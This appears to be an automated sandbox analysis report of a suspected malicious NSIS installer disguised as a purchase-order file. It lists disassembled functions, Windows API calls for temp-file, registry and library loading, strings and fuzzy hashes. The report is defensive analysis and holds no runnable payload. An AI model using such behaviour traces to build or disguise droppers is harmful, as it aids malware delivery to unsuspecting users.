                                                                      • Opcode Fuzzy Hash: 5963c7d106c76f5ca0071d1a776a8225d19f187018aad275a070e7a80bf2da84
                                                                      • Instruction Fuzzy Hash: 4B41C672900519BADB107BA5CC45DAF7AB9DF46329B20C33BF021B20E1C67C4A419A5D
                                                                      Function 00404F25 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 821 404f25-404f3a 822 404ff0-404ff4 821->822 823 404f40-404f52 821->823 824 404f54-404f58 call 405d2e 823->824 825 404f5d-404f69 lstrlenA 823->825 824->825 827 404f86-404f8a 825->827 828 404f6b-404f7b lstrlenA 825->828 830 404f99-404f9d 827->830 831 404f8c-404f93 SetWindowTextA 827->831 828->822 829 404f7d-404f81 lstrcatA 828->829 829->827 832 404fe3-404fe5 830->832 833 404f9f-404fe1 SendMessageA * 3 830->833 831->830 832->822 834 404fe7-404fea 832->834 833->832 834->822
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00000000,0078FCF8,755723A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000,?), ref: 00404F5E
                                                                      • lstrlenA.KERNEL32(00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00000000,0078FCF8,755723A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000), ref: 00404F6E
                                                                      • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00402FD7,00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00000000,0078FCF8,755723A0), ref: 00404F81
                                                                      • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll), ref: 00404F93
                                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FB9
                                                                      • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FD3
                                                                      • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FE1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                      • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll
                                                                      • API String ID: 2531174081-16754438
                                                                      • Opcode ID: 8aca45e27811aa21f79b642ec133e9ff2e42e250cada4605035ec104fac27bf5
                                                                      • Instruction ID: b1dc6bec94ba42b715134808c0c3c35089c42976f802e7ea77bea70e7b84fba8
                                                                      • Opcode Fuzzy Hash: 8aca45e27811aa21f79b642ec133e9ff2e42e250cada4605035ec104fac27bf5
                                                                      • Instruction Fuzzy Hash: 1F21817190011DBFDF119FA5DD449DEBFA9EF45354F04807AFA04A6291C7388E409BA8
                                                                      Function 004053EB Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 835 4053eb-405436 CreateDirectoryA 836 405438-40543a 835->836 837 40543c-405449 GetLastError 835->837 838 405463-405465 836->838 837->838 839 40544b-40545f SetFileSecurityA 837->839 839->836 840 405461 GetLastError 839->840 840->838
                                                                      APIs
                                                                      • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040542E
                                                                      • GetLastError.KERNEL32 ref: 00405442
                                                                      • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405457
                                                                      • GetLastError.KERNEL32 ref: 00405461
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
                                                                      • API String ID: 3449924974-4250707527
                                                                      • Opcode ID: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                      • Instruction ID: 8acfd36fb30660db29d177a8be8d7647adb8d58efdd4f3c758bfd1505ce0b010
                                                                      • Opcode Fuzzy Hash: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                      • Instruction Fuzzy Hash: CF010871D14259EADF119FA4D9447EFBFB8EF04315F004176E904B6290D378A644CFAA
                                                                      Function 00406037 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 841 406037-406057 GetSystemDirectoryA 842 406059 841->842 843 40605b-40605d 841->843 842->843 844 40606d-40606f 843->844 845 40605f-406067 843->845 847 406070-4060a2 wsprintfA LoadLibraryExA 844->847 845->844 846 406069-40606b 845->846 846->847
                                                                      APIs
                                                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040604E
                                                                      • wsprintfA.USER32 ref: 00406087
                                                                      • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040609B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                      • String ID: %s%s.dll$UXTHEME$\
                                                                      • API String ID: 2200240437-4240819195
                                                                      • Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                      • Instruction ID: 17439860729f5247506b6fa79cc71e4dc0dc9fec6db89644704a68070b9bc3a3
                                                                      • Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                      • Instruction Fuzzy Hash: BAF0F630A40209ABEB14EB78DC0DFEB365CAB08305F14017AB547F11D2EA78E8258B69
                                                                      Function 00402E9F Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 848 402e9f-402eb3 849 402eb5 848->849 850 402ebc-402ec5 848->850 849->850 851 402ec7 850->851 852 402ece-402ed3 850->852 851->852 853 402ee3-402ef0 call 40308e 852->853 854 402ed5-402ede call 4030a4 852->854 858 402ef6-402efa 853->858 859 40307c 853->859 854->853 860 402f00-402f26 GetTickCount 858->860 861 403027-403029 858->861 862 40307e-40307f 859->862 865 403084 860->865 866 402f2c-402f34 860->866 863 403069-40306c 861->863 864 40302b-40302e 861->864 867 403087-40308b 862->867 868 403071-40307a call 40308e 863->868 869 40306e 863->869 864->865 870 403030 864->870 865->867 871 402f36 866->871 872 402f39-402f47 call 40308e 866->872 868->859 881 403081 868->881 869->868 874 403033-403039 870->874 871->872 872->859 880 402f4d-402f56 872->880 877 40303b 874->877 878 40303d-40304b call 40308e 874->878 877->878 878->859 886 40304d-403059 call 405a26 878->886 883 402f5c-402f7c call 406188 880->883 881->865 890 402f82-402f95 GetTickCount 883->890 891 40301f-403021 883->891 892 403023-403025 886->892 893 40305b-403065 886->893 894 402f97-402f9f 890->894 895 402fda-402fdc 890->895 891->862 892->862 893->874 896 403067 893->896 897 402fa1-402fa5 894->897 898 402fa7-402fd2 MulDiv wsprintfA call 404f25 894->898 899 403013-403017 895->899 900 402fde-402fe2 895->900 896->865 897->895 897->898 906 402fd7 898->906 899->866 901 40301d 899->901 903 402fe4-402feb call 405a26 900->903 904 402ff9-403004 900->904 901->865 909 402ff0-402ff2 903->909 905 403007-40300b 904->905 905->883 908 403011 905->908 906->895 908->865 909->892 910 402ff4-402ff7 909->910 910->905
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: CountTick$wsprintf
                                                                      • String ID: ... %d%%
                                                                      • API String ID: 551687249-2449383134
                                                                      • Opcode ID: 64d2ce798d2dc69bad610a2ea0e87ea1e6662520605f5bed10a59724df5d2c56
                                                                      • Instruction ID: 2f6adf6c827ed57ff932280c4bcb171559557b12de80228d6f8143075edc11b6
                                                                      • Opcode Fuzzy Hash: 64d2ce798d2dc69bad610a2ea0e87ea1e6662520605f5bed10a59724df5d2c56
                                                                      • Instruction Fuzzy Hash: 5D519E7280221AABDB10DF65DA44A9F7BB8AF00755F14417BFD10B32C4C7788E51DBAA
                                                                      Function 00402364 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 911 402364-4023aa call 402b2f call 402a3a * 2 RegCreateKeyExA 918 4023b0-4023b8 911->918 919 4028cf-4028de 911->919 921 4023c8-4023cb 918->921 922 4023ba-4023c7 call 402a3a lstrlenA 918->922 925 4023db-4023de 921->925 926 4023cd-4023da call 402a1d 921->926 922->921 927 4023e0-4023ea call 402e9f 925->927 928 4023ef-402403 RegSetValueExA 925->928 926->925 927->928 933 402405 928->933 934 402408-4024de RegCloseKey 928->934 933->934 934->919 936 4026a6-4026ad 934->936 936->919
                                                                      APIs
                                                                      • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023A2
                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsq8002.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023C2
                                                                      • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023FB
                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024D8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateValuelstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsq8002.tmp
                                                                      • API String ID: 1356686001-2063696683
                                                                      • Opcode ID: d74034fd92c64aa2ed621a3478c433a983ffe71421c626bffd0a4e4897772b2d
                                                                      • Instruction ID: 90de9cbbb944b5ce7c16acb051fe3e73370ea29dc9d439d86f68b9f38bc34e97
                                                                      • Opcode Fuzzy Hash: d74034fd92c64aa2ed621a3478c433a983ffe71421c626bffd0a4e4897772b2d
                                                                      • Instruction Fuzzy Hash: 04117572E00108BFEB10AFA4EE89EAF767DEB54358F10403AF505B61D1D6B85D419B28
                                                                      Function 004059AE Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 937 4059ae-4059b8 938 4059b9-4059e4 GetTickCount GetTempFileNameA 937->938 939 4059f3-4059f5 938->939 940 4059e6-4059e8 938->940 942 4059ed-4059f0 939->942 940->938 941 4059ea 940->941 941->942
                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 004059C2
                                                                      • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059DC
                                                                      Strings
                                                                      • nsa, xrefs: 004059B9
                                                                      • "C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe", xrefs: 004059AE
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004059B1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: CountFileNameTempTick
                                                                      • String ID: "C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                      • API String ID: 1716503409-3704756738
                                                                      • Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                      • Instruction ID: 14833181556f01f8699e9ecebe408800633a5ab51cc0013a882439dab00eebba
                                                                      • Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                      • Instruction Fuzzy Hash: 2AF0E232708204ABEB109F15EC04B9B7B9CDF91720F00C03BFA049A181D2B598448B58
                                                                      Function 100016BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 943 100016bd-100016f9 call 10001a5d 947 1000180a-1000180c 943->947 948 100016ff-10001703 943->948 949 10001705-1000170b call 100021b0 948->949 950 1000170c-10001719 call 100021fa 948->950 949->950 955 10001749-10001750 950->955 956 1000171b-10001720 950->956 957 10001770-10001774 955->957 958 10001752-1000176e call 100023da call 10001559 call 10001266 GlobalFree 955->958 959 10001722-10001723 956->959 960 1000173b-1000173e 956->960 964 100017b2-100017b8 call 100023da 957->964 965 10001776-100017b0 call 10001559 call 100023da 957->965 981 100017b9-100017bd 958->981 962 10001725-10001726 959->962 963 1000172b-1000172c call 100027e8 959->963 960->955 966 10001740-10001741 call 10002aa3 960->966 969 10001733-10001739 call 10002589 962->969 970 10001728-10001729 962->970 977 10001731 963->977 964->981 965->981 974 10001746 966->974 980 10001748 969->980 970->955 970->963 974->980 977->974 980->955 985 100017fa-10001801 981->985 986 100017bf-100017cd call 100023a0 981->986 985->947 991 10001803-10001804 GlobalFree 985->991 993 100017e5-100017ec 986->993 994 100017cf-100017d2 986->994 991->947 993->985 996 100017ee-100017f9 call 100014e2 993->996 994->993 995 100017d4-100017dc 994->995 995->993 997 100017de-100017df FreeLibrary 995->997 996->985 997->993
                                                                      APIs
                                                                        • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                        • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                        • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001768
                                                                      • FreeLibrary.KERNEL32(?), ref: 100017DF
                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                        • Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2
                                                                        • Part of subcall function 10002589: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025FB
                                                                        • Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2632503904.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000000.00000002.2632485014.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2632520015.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2632534659.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_10000000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                      • String ID:
                                                                      • API String ID: 1791698881-3916222277
                                                                      • Opcode ID: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
                                                                      • Instruction ID: 7bd52774c71d274dd6e07030a7ef65efb9a892d3f5f2eddd47f658e3267813e4
                                                                      • Opcode Fuzzy Hash: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
                                                                      • Instruction Fuzzy Hash: B5319C79408205DAFB41DF649CC5BCA37ECFF042D5F018465FA0A9A09EDF78A8858B60
                                                                      Function 00401F90 Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FBB
                                                                        • Part of subcall function 00404F25: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00000000,0078FCF8,755723A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000,?), ref: 00404F5E
                                                                        • Part of subcall function 00404F25: lstrlenA.KERNEL32(00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00000000,0078FCF8,755723A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000), ref: 00404F6E
                                                                        • Part of subcall function 00404F25: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00402FD7,00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00000000,0078FCF8,755723A0), ref: 00404F81
                                                                        • Part of subcall function 00404F25: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll), ref: 00404F93
                                                                        • Part of subcall function 00404F25: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FB9
                                                                        • Part of subcall function 00404F25: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FD3
                                                                        • Part of subcall function 00404F25: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FE1
                                                                      • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
                                                                      • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                      • String ID:
                                                                      • API String ID: 2987980305-0
                                                                      • Opcode ID: bfae0568c449fe0c54a0939f3ae7a6896df299a99818b1744bd7ec33484920ac
                                                                      • Instruction ID: a6d6138a22214a2ec3127db012fcbe8ccdb9873b287714200ab65a7954d0c462
                                                                      • Opcode Fuzzy Hash: bfae0568c449fe0c54a0939f3ae7a6896df299a99818b1744bd7ec33484920ac
                                                                      • Instruction Fuzzy Hash: 93212B72904211EBDF217F648E4DAAE76B1AB45318F30423BF311B62D1C7BC4941DA6E
                                                                      Function 004015B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                      Download Yara Rule
                                                                      APIs
